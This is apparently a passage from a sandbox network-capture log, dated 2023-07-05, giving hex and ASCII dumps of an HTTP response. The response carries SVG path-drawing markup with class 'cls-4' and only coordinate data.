                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6849INData Raw: 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 38 33 2c 31 39 35 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f
                                                                                                                                                                                                                                                                          Data Ascii: 2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M692.83,195a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6865INData Raw: 22 4d 37 32 33 2e 35 39 2c 32 37 30 2e 33 34 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 33 2c 32 2e 35 33 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 33 35 2c 32 36 33 2e 34 31 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: "M723.59,270.34a1.73,1.73,0,0,1-.78,2.24,2.53,2.53,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M723.35,263.41a1.71,1.71,0,0,1-.77,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.51-2.88,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7142INData Raw: 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 34 2e 31 31 2c 33 33 38 2e 37 32 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 41 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 37 35 30 2c 33 34 30 61 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 38 38 2c 33 33 31 2e 37 39 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e
                                                                                                                                                                                                                                                                          Data Ascii: s="cls-4" d="M754.11,338.72a1.72,1.72,0,0,1-.78,2.24A2.51,2.51,0,0,1,750,340a2.39,2.39,0,0,1,.51-2.89,2.24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M753.88,331.79a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.4,2.4,0,0,1,.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7158INData Raw: 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 31 2c 32 31 33 2e 32 31 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 37 39 2c 32 30 36 2e 32 37 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: .86"/><path class="cls-4" d="M771,213.21a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.33-.94,2.39,2.39,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M770.79,206.27a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7174INData Raw: 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 31 2e 35 35 2c 32 38 31 2e 35 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 31 2e 33 31 2c 32 37 34 2e 36 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: ,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M801.55,281.59a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M801.31,274.66a1.72,1.72,0,0,1-.78,2.23,2.52,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7190INData Raw: 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 32 2e 30 37 2c 33 35 30 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 31 2e 38 34 2c 33 34 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: 5,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M832.07,350a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M831.84,343a1.72,1.72,0,0,1-.78,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7206INData Raw: 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 39 2c 32 32 34 2e 34 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 38 2e 37
                                                                                                                                                                                                                                                                          Data Ascii: 41,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"/><path class="cls-4" d="M849,224.45a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.41,2.41,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M848.7
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7495INData Raw: 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 35 2c 32 39 32 2e 38 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61
                                                                                                                                                                                                                                                                          Data Ascii: 2,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M879.5,292.83a1.72,1.72,0,0,1-.77,2.24,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><pa
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7511INData Raw: 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 30 2c 33 36 31 2e 32 31 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: ,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M910,361.21a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7527INData Raw: 37 2e 31 37 2c 32 34 32 2e 36 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 39 34 2c 32 33 35 2e 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32
                                                                                                                                                                                                                                                                          Data Ascii: 7.17,242.63a1.72,1.72,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.37,2.37,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M926.94,235.7a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7543INData Raw: 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 31 31 2c 31 37 30 2e 35 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: 1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M1027.11,170.57a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7559INData Raw: 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 31 30 2e 36 39 2c 33 30 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c
                                                                                                                                                                                                                                                                          Data Ascii: 1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"/><path class="cls-4" d="M1010.69,301a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7575INData Raw: 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 30 2e 38 36 2c 32 34 30 2e 34 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31 2e 30 39 2c 32 34 37 2e 33 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39
                                                                                                                                                                                                                                                                          Data Ascii: ,1-.16-2.81"/><path class="cls-4" d="M980.86,240.49a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M981.09,247.32a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.9
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7591INData Raw: 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 31 2e 32 36 2c 31 38 36 2e 38 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d
                                                                                                                                                                                                                                                                          Data Ascii: .38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M951.26,186.81a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d=
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7607INData Raw: 2d 34 22 20 64 3d 22 4d 39 32 31 2e 34 33 2c 31 32 36 2e 32 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 41 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 39 32 32 2c 31 32 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 36 37 2c 31 33 33 2e 31 32 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32
                                                                                                                                                                                                                                                                          Data Ascii: -4" d="M921.43,126.29a1.7,1.7,0,0,1,.77-2.2,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0A2.09,2.09,0,0,1,922,125"/><path class="cls-4" d="M921.67,133.12a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC7623INData Raw: 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 35 2e 32 34 2c 32 36 33 2e 35 36 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 35 2e 34 37 2c 32 37 30 2e 33 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37
                                                                                                                                                                                                                                                                          Data Ascii: 1,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M905.24,263.56a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M905.47,270.39a1.7,1.7,0,0,1,.77
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8265INData Raw: 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 36 35 2c 32 30 39 2e 38 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31
                                                                                                                                                                                                                                                                          Data Ascii: 2.48,2.48,0,0,1,3.29.92,2.39,2.39,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M875.65,209.87a1.69,1.69,0,0,1,.76-2.2,2.49,2.49,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81
